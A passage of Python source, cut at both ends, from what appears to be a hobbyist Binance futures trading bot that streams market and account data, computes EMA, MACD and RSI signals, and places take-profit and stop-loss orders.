if self.exchange_info == None:
raise Exception('\nFailed updating exchange info\n')
print('========== Succeed updating exchage info ==========')
def update_client(self):
client = Client(self.__api_key, self.__api_secret)
self.client = client
if self.client == None:
raise Exception('\nFailed updating client\n')
print('========== Succeed updating client ==========')
def update_listen_key(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#listenkey-user_stream-
'''
request_client = RequestClient(api_key=self.__api_key, secret_key=self.__api_secret)
listen_key = request_client.start_user_data_stream()
self.request_client = request_client
self.listen_key = listen_key
self.update_sub_client()
print('========== Succeed updating listen key ==========')
def extend_listen_key(self):
'''
Keep user data stream
https://binance-docs.github.io/apidocs/futures/cn/#listenkey-user_stream2
'''
result = self.request_client.keep_user_data_stream()
print("Trying to reconnect...\nResult: ", result)
def update_account_info(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#v2-user_data-2
'''
result = self.request_client.get_account_information_v2()
self.account_info = result
if self.account_info == None:
raise Exception('\nFailed updating account info\n')
print('========== Succeed updating account info ==========')
def update_sub_client(self):
sub_client = SubscriptionClient(api_key=g_api_key, secret_key=g_secret_key)
self.sub_client = sub_client
if self.sub_client == None:
raise Exception('\nFailed updating subscription client\n')
print('========== Succeed updating subscription client ==========')
def subscribe_book_depth_event(self):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/example/websocket/subscribebookdepth.py
https://binance-docs.github.io/apidocs/futures/cn/#6ae7c2b506
'''
logger = logging.getLogger("binance-futures")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
def callback(data_type: 'SubscribeMessageType', event: 'any'):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderbookevent.py
'''
if data_type == SubscribeMessageType.RESPONSE:
pass
# print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
self.depth_object = event
self.__latest_depth_update_timestamp = event.transactionTime
# print("Event type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("transaction time: ", event.transactionTime)
# print("Symbol: ", event.symbol)
# print("first update Id from last stream: ", event.firstUpdateId)
# print("last update Id from last stream: ", event.lastUpdateId)
# print("last update Id in last stream: ", event.lastUpdateIdInlastStream)
# print("=== Bids ===")
# PrintMix.print_data(event.bids)
# print("===================")
# print("=== Asks ===")
# PrintMix.print_data(event.asks)
# print("===================")
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
print(e.error_code + e.error_message)
log = "\n\n{}\nBook depth subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
# Valid limit values are 5, 10, or 20
self.sub_client.subscribe_book_depth_event(self.__paried_symbol.lower(), 20, callback, error, update_time=UpdateTime.FAST)
#sub_client.subscribe_book_depth_event("btcusdt", 10, callback, error, update_time=UpdateTime.NORMAL)
#sub_client.subscribe_book_depth_event("btcusdt", 10, callback, error)
def subscribe_user_data_event(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#balance-position
https://binance-docs.github.io/apidocs/futures/cn/#060a012f0b
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/accountupdate.py
'''
logger = logging.getLogger("binance-client")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
sub_client = self.sub_client
def callback(data_type: 'SubscribeMessageType', event: 'any'):
if data_type == SubscribeMessageType.RESPONSE:
print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
if (event.eventType == "ACCOUNT_UPDATE"):
for item in event.positions:
if (item.symbol == self.__paried_symbol):
self.account_update_list.append(event)
put_to_log('\n\nPosition updated: {}\n{}\n'.format(current_date_time(), convert_object_to_string(item)), self.__position_log_path)
self.position_status.position_last_update_time = event.transactionTime
# print('\n\n\n------------------')
# print('Position amount')
# print("Event Type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Current time: ", current_date_time())
# print("Transaction time: ", event.transactionTime)
# print('------------------')
# print(PrintMix.print_data(self.position_status))
self.position_status.position_object = item
# print('---------- CHANGED TO ----------')
# PrintMix.print_data(self.position_status)
# print('------------------\n')
# print("=== Balances ===")
# PrintMix.print_data(event.balances)
# print("================")
# print("=== Positions ===")
# PrintMix.print_data(event.positions)
# print("================")
elif(event.eventType == "ORDER_TRADE_UPDATE"):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
NEW
PARTIAL_FILL 部分成交
FILL 成交
CANCELED 已撤
CALCULATED
EXPIRED 订单失效
TRADE 交易
'''
if event.symbol == self.__paried_symbol:
self.order_update_list.append(event)
# print('------------------')
# print("Event Type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Current time: ", current_date_time())
# print("Transaction Time: ", event.transactionTime)
# print('------------------')
# print(PrintMix.print_data(self.position_status))
self.position_status.order_status = event.orderStatus
self.position_status.order_cumulativeFilledQty = event.cumulativeFilledQty
self.position_status.order_amount = event.avgPrice
self.position_status.order_side = event.side
self.position_status.order_last_update_time = event.eventTime
# print('---------- CHANGED TO ----------')
# PrintMix.print_data(self.position_status)
# print('------------------\n\n\n')
# print("Symbol: ", event.symbol)
# print("Client Order Id: ", event.clientOrderId)
# print("Side: ", event.side)
# print("Order Type: ", event.type)
# print("Time in Force: ", event.timeInForce)
# print("Original Quantity: ", event.origQty)
# print("Position Side: ", event.positionSide)
# print("Price: ", event.price)
# print("Average Price: ", event.avgPrice)
# print("Stop Price: ", event.stopPrice)
# print("Execution Type: ", event.executionType)
# print("Order Status: ", event.orderStatus)
# print("Order Id: ", event.orderId)
# print("Order Last Filled Quantity: ", event.lastFilledQty)
# print("Order Filled Accumulated Quantity: ", event.cumulativeFilledQty)
# print("Last Filled Price: ", event.lastFilledPrice)
# print("Commission Asset: ", event.commissionAsset)
# print("Commissions: ", event.commissionAmount)
# print("Order Trade Time: ", event.orderTradeTime)
# print("Trade Id: ", event.tradeID)
# print("Bids Notional: ", event.bidsNotional)
# print("Ask Notional: ", event.asksNotional)
# print("Is this trade the maker side?: ", event.isMarkerSide)
# print("Is this reduce only: ", event.isReduceOnly)
# print("stop price working type: ", event.workingType)
# print("Is this Close-All: ", event.isClosePosition)
# if not event.activationPrice is None:
# print("Activation Price for Trailing Stop: ", event.activationPrice)
# if not event.callbackRate is None:
# print("Callback Rate for Trailing Stop: ", event.callbackRate)
elif(event.eventType == "listenKeyExpired"):
print("\nEvent: ", event.eventType)
print("Event time: ", event.eventTime)
print("CAUTION: YOUR LISTEN-KEY HAS BEEN EXPIRED!!!")
print("CAUTION: YOUR LISTEN-KEY HAS BEEN EXPIRED!!!")
print("CAUTION: YOUR LISTEN-KEY HAS BEEN EXPIRED!!!")
self.extend_listen_key()
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
# print(e.error_code + e.error_message)
log = "\n\n{}\nUser data subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
sub_client.subscribe_user_data_event(self.listen_key, callback, error)
def subscribe_candlestick_event(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#k-4
or
https://binance-docs.github.io/apidocs/futures/cn/#k-5
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/candlestickevent.py
'''
logger = logging.getLogger("binance-futures")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
sub_client = self.sub_client
def callback(data_type: 'SubscribeMessageType', event: 'any'):
if data_type == SubscribeMessageType.RESPONSE:
pass
# print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
self.update_historical_kline(event)
# print("Event type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Symbol: ", event.symbol)
# print("Data:")
# PrintBasic.print_obj(event.data)
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
# print(e.error_code + e.error_message)
log = "\n\n{}\nCandlestick subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
sub_client.subscribe_candlestick_event(self.__paried_symbol.lower(), self.__interval, callback, error)
def update_historical_kline(self, event):
'''
https://binance-docs.github.io/apidocs/futures/cn/#k-4
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/candlestickevent.py
event:
Event type: kline
Event time: 1609506873291
Symbol: BLZUSDT
Data:
close:0.06756
closeTime:1609506899999
firstTradeId:3634790
high:0.06758
ignore:0
interval:1m
isClosed:False
json_parse:<function Candlestick.json_parse at 0x107909d30>
lastTradeId:3634796
low:0.06751
numTrades:7
open:0.06758
quoteAssetVolume:746.46888
startTime:1609506840000
symbol:BLZUSDT
takerBuyBaseAssetVolume:0.0
takerBuyQuoteAssetVolume:0.0
volume:11054.0
'''
try:
startTime = event.data.startTime
isClosed = event.data.isClosed
if isClosed:
self.get_historical_kline()
elif startTime - self.kline_info['updated_time'] < 60000:
kline_info = self.kline_info.copy()
kline_object = event.data
kline_info['kline_list']['open_price_list'][-1] = float(kline_object.open) # o
kline_info['kline_list']['high_price_list'][-1] = float(kline_object.high) # h
kline_info['kline_list']['low_price_list'][-1] = float(kline_object.low) # l
kline_info['kline_list']['close_price_list'][-1] = float(kline_object.close) # c
kline_info['kline_list']['quoteAssetVolume_list'][-1] = float(kline_object.quoteAssetVolume) # vol(quoAsset)
kline_info['kline_list']['volume_list'][-1] = float(kline_object.volume) # vol
kline_info['kline_list']['takerBuyBaseAssetVolume_list'][-1] = float(kline_object.takerBuyBaseAssetVolume) # takerBuyBaseAssetVolume
kline_info['kline_list']['takerBuyQuoteAssetVolume_list'][-1] = float(kline_object.takerBuyQuoteAssetVolume) # takerBuyQuoteAssetVolume
kline_info['kline_list']['numTrades_list'][-1] = int(kline_object.numTrades) # numTrades
kline_info['updated_time'] = startTime
self.kline_info = kline_info
else:
self.get_historical_kline()
self.__latest_data_update_timestamp = event.eventTime
# print(self.kline_info['kline_list']['close_price_list'][-10:])
except Exception as e:
log = "\n\n{}\nAn ERROR happend while updating historical data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def get_historical_kline(self):
'''
klines:
close:347.15
closeTime:1609496279999
high:347.75
ignore:0
json_parse:<function Candlestick.json_parse at 0x10c8b41f0>
low:347.06
numTrades:298
open:347.30
openTime:1609496220000
quoteAssetVolume:65901.36106
takerBuyBaseAssetVolume:111.498
takerBuyQuoteAssetVolume:38745.65489
volume:189.645
[
[
1499040000000, // 开盘时间
"0.01634790", // 开盘价 o
"0.80000000", // 最高价 h
"0.01575800", // 最低价 l
"0.01577100", // 收盘价(当前K线未结束的即为最新价) c
"148976.11427815", // 成交量
1499644799999, // 收盘时间
"2434.19055334", // 成交额
308, // 成交笔数
"1756.87402397", // 主动买入成交量
"28.46694368", // 主动买入成交额
"17928899.62484339" // 请忽略该参数
]
]
'''
try:
klines = self.request_client.get_candlestick_data(symbol=self.__paried_symbol, interval=self.__interval,limit=self.__initial_data_num)
# PrintBasic.print_obj(klines[-1])
last_n = klines[((-1) * self.__initial_data_num):]
kline_info = self.kline_info.copy()
kline_info['kline_list'] = {
'open_price_list': [],
'high_price_list': [],
'low_price_list': [],
'close_price_list': [],
'quoteAssetVolume_list': [],
'volume_list': [],
'takerBuyBaseAssetVolume_list': [],
'takerBuyQuoteAssetVolume_list': [],
'numTrades_list': []
}
kline_info['updated_time'] = last_n[-1].openTime
for item in last_n:
kline_info['kline_list']['open_price_list'].append(float(item.open)) # o
kline_info['kline_list']['high_price_list'].append(float(item.high)) # h
kline_info['kline_list']['low_price_list'].append(float(item.low)) # l
kline_info['kline_list']['close_price_list'].append(float(item.close)) # c
kline_info['kline_list']['quoteAssetVolume_list'].append(float(item.quoteAssetVolume)) # vol(quoAsset)
kline_info['kline_list']['volume_list'].append(float(item.volume)) # vol
kline_info['kline_list']['takerBuyBaseAssetVolume_list'].append(float(item.takerBuyBaseAssetVolume)) # takerBuyBaseAssetVolume
kline_info['kline_list']['takerBuyQuoteAssetVolume_list'].append(float(item.takerBuyQuoteAssetVolume)) # takerBuyQuoteAssetVolume
kline_info['kline_list']['numTrades_list'].append(int(item.numTrades)) # numTrades
self.kline_info = kline_info
print('========== Succeed getting historical data ==========')
# print(self.kline_info['kline_list']['close_price_list'])
except Exception as e:
log = "\n\n{}\nAn ERROR happend while getting historical data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def start_subscribing(self):
try:
t1 = threading.Thread(target=self.subscribe_candlestick_event)
t2 = threading.Thread(target=self.subscribe_user_data_event)
# t3 = threading.Thread(target=self.subscribe_book_depth_event)
# subs_task_list = [t1, t2, t3]
subs_task_list = [t1, t2]
for task in subs_task_list:
task.start()
for task in subs_task_list:
task.join()
except Exception as e:
log = "\n\n{}\nAn ERROR happend while starting subscription: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def start_handler(self):
time.sleep(3)
try:
t1 = threading.Thread(target=self.order_handler)
t2 = threading.Thread(target=self.position_handler)
# t3 = threading.Thread(target=self.position_status_handler)
handler_task_list = [t1, t2]
for task in handler_task_list:
task.start()
for task in handler_task_list:
task.join()
except Exception as e:
log = "\n\n{}\nAn ERROR happend while starting the handler: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def get_recommendation(self, MACD_dict, EMA_dict, RSI_dict):
level = 0
side = None
try:
# Long
if ( ( EMA_dict['ema2'][-1] > EMA_dict['ema3'][-1] ) and ( EMA_dict['ema2'][-2] < EMA_dict['ema3'][-2] ) ):
side = 'long'
level = 3
return level, side
# Short
elif ( ( EMA_dict['ema2'][-1] < EMA_dict['ema3'][-1] ) and ( EMA_dict['ema2'][-2] > EMA_dict['ema3'][-2] ) ):
side = 'short'
level = 3
return level, side
# # Long
# elif ( ( RSI_dict['rsi1'][-1] > 30 ) and ( RSI_dict['rsi1'][-2] < 30 ) and ( RSI_dict['rsi2'][-1] > 30 ) and ( RSI_dict['rsi2'][-2] < 30 ) and ( RSI_dict['rsi3'][-1] > 30 ) and ( RSI_dict['rsi3'][-2] < 30 ) ):
# side = 'long'
# level = 2
# return level, side
# Short
# elif ( ( RSI_dict['rsi1'][-1] < 70 ) and ( RSI_dict['rsi1'][-2] > 70 ) and ( RSI_dict['rsi2'][-1] < 70 ) and ( RSI_dict['rsi2'][-2] > 70 ) and ( RSI_dict['rsi3'][-1] < 70 ) and ( RSI_dict['rsi3'][-2] > 70 ) ):
# side = 'short'
# level = 2
# return level, side
# Long
elif ( ( ( EMA_dict['ema1'][-1] > EMA_dict['ema3'][-1] ) and ( EMA_dict['ema1'][-2] < EMA_dict['ema3'][-2] ) ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) >= 0 ) ) ):
side = 'long'
level = 2
return level, side
# Short
elif ( ( ( EMA_dict['ema1'][-1] < EMA_dict['ema3'][-1] ) and ( EMA_dict['ema1'][-2] > EMA_dict['ema3'][-2] ) ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) <= 0 ) ) ):
side = 'short'
level = 2
return level, side
# Long
elif ( ( ( EMA_dict['ema1'][-1] > EMA_dict['ema2'][-1] ) and ( EMA_dict['ema1'][-2] < EMA_dict['ema2'][-2] ) ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) >= 0 ) ) ):
side = 'long'
level = 1
return level, side
# Short
elif ( ( ( EMA_dict['ema1'][-1] < EMA_dict['ema2'][-1] ) and ( EMA_dict['ema1'][-2] > EMA_dict['ema2'][-2] ) ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) <= 0 ) ) ):
side = 'short'
level = 1
return level, side
except Exception as e:
log = "\n\n{}\nAn ERROR happend while getting recommendations: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
return level, side
else:
# return 1, 'short'
return level, side
def start_analysing(self):
while True:
try:
# print((self.current_recommendation['short']['updated_time']))
if ((current_utc_time() - (self.current_recommendation['short']['updated_time'])) > 0.5):
self.current_recommendation['short'] = {
'updated_time': 0,
'level': 0,
'price': None
}
if ((current_utc_time() - (self.current_recommendation['long']['updated_time'])) > 0.5):
self.current_recommendation['long'] = {
'updated_time': 0,
'level': 0,
'price': None
}
kline_info = self.kline_info
if len(kline_info['kline_list']['close_price_list']) == self.__initial_data_num:
self.__latest_data_analysis_timestamp = self.__latest_data_update_timestamp
MACD, EMA, RSI, EMV = get_indicators(kline_info['kline_list'], self.indicator_config)
if ((MACD != None) and (EMA != None) and (RSI != None)):
MACD_dict = {
'macd': np.round(MACD[0], decimals=4),
'macdsignal': np.round(MACD[1], decimals=4),
'macdhist': np.round(MACD[2], decimals=4)
}
EMA_dict = {
'ema1': np.round(EMA[0], decimals=3),
'ema2': np.round(EMA[1], decimals=3),
'ema3': np.round(EMA[2], decimals=3)
}
RSI_dict = {
'rsi1': np.round(RSI[0], decimals=3),
'rsi2': np.round(RSI[1], decimals=3),
'rsi3': np.round(RSI[2], decimals=3)
}
self.indicator_dict = {
'MACD_dict': MACD_dict,
'EMA_dict': EMA_dict,
'RSI_dict': RSI_dict,
'EMV_list': EMV
}
latest_price = kline_info['kline_list']['close_price_list'][-1]
level, side = self.get_recommendation(MACD_dict, EMA_dict, RSI_dict)
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': None,
'level': 0,
'price': None
}
}
'''
if level >= 0:
if (side == 'long' or side == 'short'):
self.current_recommendation[side]['level'] = level
self.current_recommendation[side]['price'] = latest_price
self.current_recommendation[side]['updated_time'] = current_utc_time()
temp_logs = '\n\n{}\nNew {} recommendation:\nLevel: {}\nPrice: {}\nDatetime: {}\nTimestamp: {}\n{}\n\n'.format(
self.margin,
side.upper(),
level,
latest_price,
utc_2_datetime(self.current_recommendation[side]['updated_time']),
self.current_recommendation[side]['updated_time'],
self.margin
)
# print(temp_logs)
put_to_log(temp_logs, self.__recommendation_log_path)
# print ("\r||(MACD - MACDSignal) = {:.3f}||RSI({}): {:.3f}||RSI({}): {:.3f}||RSI({}): {:.3f}||EMA{}: {:.3f}||EMA{}: {:.3f}|| EMA{}: {:.3f}||Buy level: {}||Sell level: {}||Price: {:.2f}||Time: {}||".format
# (macd[-1] - macdsignal[-1],
# self.indicator_config['rsi']['rsi1'],
# rsi1[-1],
# self.indicator_config['rsi']['rsi2'],
# rsi2[-1],
# self.indicator_config['rsi']['rsi3'],
# rsi3[-1],
# self.indicator_config['ema']['ema1'],
# ema1[-1],
# self.indicator_config['ema']['ema2'],
# ema2[-1],
# self.indicator_config['ema']['ema3'],
# ema3[-1],
# buy_level,
# sell_level,
# float(np_price_list[-1]),
# current_date_time()
# ), end="")
except Exception as e:
log = "\n\n{}\nAn ERROR happend while analyzing market data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def check_if_service_avaliable(self):
'''
https://stackoverflow.com/questions/16755394/what-is-the-easiest-way-to-get-current-gmt-time-in-unix-timestamp-format
'''
time.sleep(3)
while True:
if len(self.current_position_dict) > 0:
string = "\r|" + current_date_time()
for clientID in self.current_position_dict.keys():
string += "|PositionSide: {} |Amount: {} |EntryPrice: {}|CurrentPrice: {} ROE: {:.3f}%|".format(
self.current_position_dict[clientID]['positionSide'],
self.current_position_dict[clientID]['quantity'] if self.current_position_dict[clientID]['quantity']!= None else "NA",
self.current_position_dict[clientID]['entryPrice'] if self.current_position_dict[clientID]['entryPrice'] else "NA",
self.kline_info['kline_list']['close_price_list'][-1] if self.kline_info['kline_list']['close_price_list'][-1] != None else "NA",
(100*self.__leverage*(self.kline_info['kline_list']['close_price_list'][-1]/self.current_position_dict[clientID]['entryPrice']-1) * (-1) if self.current_position_dict[clientID]['positionSide'].lower() == 'short' else 1) if ( self.current_position_dict[clientID]['entryPrice'] != None) else 0.00
)
print(string, end = "")
else:
kling_string = '|o:{:.2f}|h:{:.2f}|l:{:.2f}|c:{:.2f}|QuoVol:{:.2f}|BaseVol:{:.2f}|BuyBaseVol:{:.2f}|BuyQuoVol:{:.2f}|numTrades:{}|'.format(
self.kline_info['kline_list']['open_price_list'][-1],
self.kline_info['kline_list']['high_price_list'][-1],
self.kline_info['kline_list']['low_price_list'][-1],
self.kline_info['kline_list']['close_price_list'][-1],
self.kline_info['kline_list']['quoteAssetVolume_list'][-1],
self.kline_info['kline_list']['volume_list'][-1],
self.kline_info['kline_list']['takerBuyBaseAssetVolume_list'][-1],
self.kline_info['kline_list']['takerBuyQuoteAssetVolume_list'][-1],
self.kline_info['kline_list']['numTrades_list'][-1]
)
recommendation_string = '|_R_|LONG:L: {},P:{}|SHORT:L: {},P:{}|'.format(
self.current_recommendation['long']['level'],
self.current_recommendation['long']['price'],
self.current_recommendation['short']['level'],
self.current_recommendation['short']['price']
)
indicator_dict = self.indicator_dict
if len(indicator_dict) > 0:
# print(indicator_dict['EMV_list'][-1])
indicator_string = '|EMA:{:.2f}--{:.2f}--{:.2f}|MACDdiff:{:.2f}|EMV:{:.2f}|'.format(
indicator_dict['EMA_dict']['ema1'][-1],
indicator_dict['EMA_dict']['ema2'][-1],
indicator_dict['EMA_dict']['ema3'][-1],
indicator_dict['MACD_dict']['macd'][-1] - indicator_dict['MACD_dict']['macdsignal'][-1],
indicator_dict['EMV_list'][-1]
)
else:
indicator_string = ""
print('\r' + kling_string + recommendation_string + indicator_string, end="")
try:
# time.sleep(1)
# if self.depth_object!= None:
# bids_string = '{}'.format([order.price for order in self.depth_object.bids[-10:]])
# asks_string = '{}'.format([order.price for order in self.depth_object.asks[-10:]])
# margin = '========================================================================='
# print('\n\n\n{}\nRecent Market Prices:\n{}\n\nTop bids:\n{}\n\nTop asks:\n{}\n{}\n\n\n'.format(margin, price_string, bids_string, asks_string, margin))
current_time = current_utc_time()*1000
server_status = self.client.get_system_status()
current_candlestick_data_time = int(self.__latest_data_update_timestamp)
current_depth_data_time = int(self.__latest_depth_update_timestamp)
candlestick_data_time_diff_in_seconds = (current_time - current_candlestick_data_time)/1000
depth_data_time_diff_in_seconds = (current_time - current_depth_data_time)/1000
if server_status['status'] == 1:
print('> > > > > > > > > > > > > > System maintenance. < < < < < < < < < < < < < < < <')
if ((candlestick_data_time_diff_in_seconds > 1) and (current_time != (candlestick_data_time_diff_in_seconds*1000))):
print("Candlestick data fetching was down for: {:.3f}s".format(candlestick_data_time_diff_in_seconds))
if ((depth_data_time_diff_in_seconds > 1) and (current_time!=(depth_data_time_diff_in_seconds*1000))):
print("Depth data fetching was down for: {:.3f}s".format(depth_data_time_diff_in_seconds))
except Exception as e:
log = "\n\n{}\nAn ERROR happend while monitoring services: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def position_handler(self):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
has_key was removed in Python 3:
https://stackoverflow.com/questions/33727149/dict-object-has-no-attribute-has-key?answertab=votes#tab-top
https://docs.python.org/3.0/whatsnew/3.0.html#builtins
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
self.current_position_dict = {
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'comission': 999,
'relatedOrderID': {}
}
Order status (status):
NEW
PARTIALLY_FILLED
FILLED
CANCELED
REJECTED
EXPIRED
'''
while True:
try:
if len(self.order_update_list) > 0:
first_order = self.order_update_list.pop(0)
clientOrderId = first_order.clientOrderId
if len(clientOrderId) >= 13:
prefix_id = clientOrderId[:13]
else:
prefix_id = clientOrderId
if prefix_id in self.current_position_dict:
print("\n====================================================================\nReceived a bot order:")
PrintMix.print_data(first_order)
put_to_log('\n\nBot order: {}\n{}\n'.format(current_date_time(), convert_object_to_string(first_order)), self.__order_log_path)
print("====================================================================")
positionSide = first_order.positionSide.lower()
orderPosition = first_order.side.lower()
orderStatus = first_order.orderStatus.lower()
if ((positionSide == 'long' and orderPosition == 'buy') or (positionSide == 'short' and orderPosition == 'sell')):
if (orderStatus == 'PARTIALLY_FILLED'.lower() or orderStatus == 'FILLED'.lower()):
if orderStatus == 'PARTIALLY_FILLED'.lower():
try:
self.client.futures_cancel_order(origClientOrderId = clientOrderId, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while cancelling the unfilled order: {}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientOrderId,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
self.current_position_dict[prefix_id]['entryPrice'] = first_order.avgPrice
self.current_position_dict[prefix_id]['quantity'] = first_order.cumulativeFilledQty
self.current_position_dict[prefix_id]['relatedOrderID'][clientOrderId] = first_order
self.current_position_dict[prefix_id]['comission'] += (0 if first_order.commissionAmount == None else first_order.commissionAmount)
# self.__starting_asset_value -= ((first_order.avgPrice * first_order.cumulativeFilledQty)/self.__leverage)
#TODO: sell order:
correspondingTargetProfitRatio = self.target_profit_dict['level' + str(self.current_position_dict[prefix_id]['level'])]
if positionSide.lower() == 'long':
TP_stopPrice = round( ( first_order.avgPrice * (1+ (correspondingTargetProfitRatio + self.__comission_rate)/self.__leverage) ) ,2)
SM_stopPrice = round( ( first_order.avgPrice * (1-(self.__stop_loss_ratio)/self.__leverage) ),2)
elif positionSide.lower() == 'short':
TP_stopPrice = round( ( first_order.avgPrice * (1 - (correspondingTargetProfitRatio + self.__comission_rate)/self.__leverage) ) ,2)
SM_stopPrice = round( ( first_order.avgPrice * (1 + (self.__stop_loss_ratio)/self.__leverage) ),2)
quantity =round((first_order.avgPrice*first_order.lastFilledQty),3)
# Take profit order
self.client.futures_create_order(symbol = self.__paried_symbol,
side=(OrderSide.BUY if positionSide.lower() == "short" else OrderSide.SELL),
type=OrderType.TAKE_PROFIT,
positionSide=positionSide.upper(),
# closePosition=True,
quantity =quantity,
stopPrice = TP_stopPrice,
price = TP_stopPrice,
newClientOrderId= prefix_id + OrderSide.SELL + "_" + positionSide + "_TP",
)
# Stop loss order
self.client.futures_create_order(symbol = self.__paried_symbol,
side=(OrderSide.BUY if positionSide.lower() == "short" else OrderSide.SELL),
type=OrderType.STOP_MARKET,
positionSide=positionSide.upper(),
closePosition=True,
quantity =quantity,
stopPrice = SM_stopPrice,
newClientOrderId= prefix_id + OrderSide.SELL + "_" + positionSide + "_SM",
)
else:
self.current_position_dict[prefix_id]['relatedOrderID'][clientOrderId] = first_order
elif ((positionSide == 'long' and orderPosition == 'sell') or (positionSide == 'short' and orderPosition == 'buy')):
self.current_position_dict[prefix_id]['comission'] += (0 if first_order.commissionAmount == None else first_order.commissionAmount)
self.current_position_dict[prefix_id]['relatedOrderID'][clientOrderId] = first_order
if orderStatus == 'FILLED'.lower():
TP = clientOrderId[:-2] + "TP"
SM = clientOrderId[:-2] + "SM"
clientOrderID_not_filled = TP if clientOrderId[-2:] == "SM" else SM
originalSpend = self.current_position_dict[prefix_id]['entryPrice'] * self.current_position_dict[prefix_id]['quantity']
TP_quantity = self.current_position_dict[prefix_id]['relatedOrderID'][TP].cumulativeFilledQty
TP_average_price = self.current_position_dict[prefix_id]['relatedOrderID'][TP].avgPrice
TP_total = TP_quantity * TP_average_price
SM_quantity = self.current_position_dict[prefix_id]['relatedOrderID'][SM].cumulativeFilledQty
SM_average_price = self.current_position_dict[prefix_id]['relatedOrderID'][SM].avgPrice
SM_total = SM_quantity * SM_average_price
if positionSide.upper() == 'short':
profit = ( (TP_total + SM_total)- originalSpend - self.current_position_dict[prefix_id]['comission'])
else:
profit = ( originalSpend - (TP_total + SM_total) - self.current_position_dict[prefix_id]['comission'])
self.__starting_asset_value += profit
try:
self.client.futures_cancel_order(origClientOrderId = clientOrderID_not_filled, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while cancelling the order: {}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientOrderID_not_filled,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
else:
log_string = '\n\n{}\nPNL for this order:\nclientOrderId: {}\npositionSide: {}\nentryPrice: {}\nexitPrice: {}\nTakeProfitAmount: {}\n TakeProfitQuantity: {}\n TakeProfitPrice: {}\nStopLossAmount: {}\n StopLossQuantity: {}\n StopLossPrice: {}\nComission: {}\nProfit: {}\nStart Datetime: {}\nFinished Datetime: {}\n{}'.format(self.margin,
prefix_id,
positionSide.upper(),
self.current_position_dict[prefix_id]['entryPrice'],
((TP_total + SM_total)/(TP_quantity + SM_quantity)),
TP_total, TP_quantity, TP_average_price,
